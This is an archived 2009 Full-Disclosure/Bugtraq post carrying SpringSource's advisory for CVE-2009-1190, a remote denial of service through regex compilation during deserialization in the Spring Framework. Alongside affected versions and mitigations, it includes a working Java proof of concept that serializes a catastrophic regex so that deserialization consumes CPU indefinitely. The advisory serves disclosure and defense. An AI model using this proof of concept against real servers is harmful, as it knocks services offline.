lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1D29E373EC8D9F41BDF0B42330826CBD0B2EFE3F2D@EXCHANGE.springsource.com>
Date: Fri, 24 Apr 2009 03:51:35 -0500
From: Mark Thomas <Mark.Thomas@...ingsource.com>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>,
	"bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>
Subject: CVE-2009-1190: Spring Framework Remote Denial of
 Service Vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

CVE-2009-1190: Spring Framework Remote Denial of Service Vulnerability

Severity: Low

Vendor: SpringSource

Versions Affected:
Spring Framework 1.1.0-2.5.6, 3.0.0.M1-3.0.0.M2
dm Server 1.0.0-1.0.2 (note 2.x not affected since dm Server 2.x requires a 1.6 JDK)

Description:
The j.u.r.Pattern.compile method in Sun 1.5 JDK has a problem ([1],[2]) with exponential compilation times, when using optional groups. A workaround [3] was implemented in 1.4.2_06 but the root cause of poor performance in regex processing was not resolved until JDK 1.6.
JdkRegexpMethodPointcut calls Pattern.compile(source[i]); via it's inherited readObject method (from AbstractRegexpMethodPointcut). When Sun JVM 1.5 driven application with spring.jar in its classpath accepts serializable data, an attacker could use a long regex string with many optional groups to consume enormous CPU resources. And, with a few requests all listeners will be occupied with compiling regex expressions forever.

Mitigation:
* Users of all products may upgrade to JRE/JDK 1.6 which includes the fix for the root cause
* Spring Framework 2.5.6.SEC01 has been released for Community users that includes a workaround to the root cause - see[4] for upgrade steps
* Spring Framework 2.5.6.SR02 is available for Enterprise users that includes a workaround to the root cause; The software can be found in the Customer Portal [5]
* Disable functionality that accepts serializable data from untrusted sources
* Spring Framework 3.0.0.M3 will be released shortly that includes a workaround to the root cause
* dm Server 1.0.2 Community users may replace the Spring Framework 2.5.6 jar with 2.5.6.SEC01 - see[4] for upgrade steps
* dm Server 1.0.3 that includes a workaround to the root cause will be released shortly
* Instrumented Spring Framework 2.5.6.SR02 that includes a workaround to the root cause will be released by April 27, 2009

Example:
public class DoSSpring {

 static byte[] getSerialized(Object o) throws Exception {
  ByteArrayOutputStream baos = new ByteArrayOutputStream();
  ObjectOutputStream oos = new ObjectOutputStream(baos);
  oos.writeObject(o);
  oos.flush();
  oos.close();
  return baos.toByteArray();
 }

 public static void main(String[] a) throws Exception{
  String thePattern="(Y)?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)" +
      "?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)?(K)" +
      "?(W)?(I)?(U)?(a)?$";
  String longerPattern = thePattern.substring(0,thePattern.length()-1)+thePattern;
  int length = longerPattern.length();
  String fakePattern = longerPattern.replaceAll(".", "A");
  JdkRegexpMethodPointcut jrmp = new JdkRegexpMethodPointcut();
  jrmp.setPattern(fakePattern);
  System.out.println(jrmp);
  byte[] theArray = getSerialized(jrmp);
  int i = 0;
  for (; i < theArray.length;i++) {
   if (((char)theArray[i])=='A' &&((char)theArray[i+1]=='A')) {
    break;
   }
  }
  System.arraycopy(longerPattern.getBytes(), 0, theArray, i, length);

  ByteArrayInputStream bis = new ByteArrayInputStream(theArray);
  ObjectInputStream ois = new ObjectInputStream(bis);
  Object o = ois.readObject(); // returns after a very very long time

 }
}

Credit:
This issue was discovered by the RedHat Security Response Team

References:
[1] http://www.packetstormsecurity.org/hitb06/DAY_1_-_Marc_Schoenefeld_-_Pentesting_Java_J2EE.pdf
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2540
[3] http://archive.cert.uni-stuttgart.de/uniras/2005/01/msg00035.html
[4] http://www.springsource.com/securityadvisory
[5] http://www.springsource.com/spring_account_file
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAknxfZcACgkQb7IeiTPGAkMX0gCdGsE5fqOd0PcMdcYrLTwyejGp
4p0An1Dwr9T+WsCwytVrztkskexVw84T
=zBj5
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ